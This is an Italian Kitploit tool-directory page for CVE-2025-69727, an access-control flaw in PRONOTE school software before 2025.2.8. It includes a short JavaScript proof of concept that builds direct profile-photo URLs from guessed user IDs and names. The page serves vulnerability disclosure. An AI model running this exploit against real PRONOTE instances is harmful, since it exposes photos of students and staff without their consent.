Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-69727 — CVE-2025-69727 | Kitploit
Strumenti/GitHubGitHub/0xzerosec/cve-2025-69727
RicognizioneAnalisi delle VulnerabilitàRaccolta InformazioniSicurezza WebConfigurazione Errata
GitHub0xzerosec/cve-2025-69727

CVE-2025-69727

CVE-2025-69727

Vedi Repository
25 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-69727

Fornitore del Prodotto

INDEX-EDUCATION

Base di Codice del Prodotto Affetto

PRONOTE - 202X.X.X < 2025.2.8

Descrizione

Esiste una vulnerabilità di Controllo degli Accessi Incorretto in INDEX-EDUCATION PRONOTE precedente alla versione 2025.2.8. I componenti interessati (composeUrlImgPhotoIndividu) permettono la costruzione di URL diretti alle immagini dei profili utente basandosi esclusivamente su identificatori prevedibili come ID utente e nomi. A causa della mancanza di controlli di autorizzazione e dell'assenza di limitazione delle richieste durante la generazione o l'accesso a questi URL, un attore non autenticato o non autorizzato può recuperare le foto profilo degli utenti creando richieste con identificatori indovinati o conosciuti.

PoC

root@kitploit:~
const arr = [] // List of users
const base = "https://demo.index-education.net/pronote";

IE.fModule({
  f: function (exports, require, module, global) {
    const ObjetElement = require("ObjetElement");
    const AccesApp = global.GApplication;

    const comm = AccesApp.communication;

    for (const obj of arr) {
      const path = comm.composeUrlFichierExterne(
        obj.L.replace(/[\s]/gi, "_") + ".jpg",
        new ObjetElement.ObjetElement("", obj.N)
      );

      const url = `${base}/${path}`;

      console.log(url);
    }
  },
  fn: "testIEmodule.js",
});

Scopritore

  • raphckrman
  • GameCreep35
Scarica lo strumento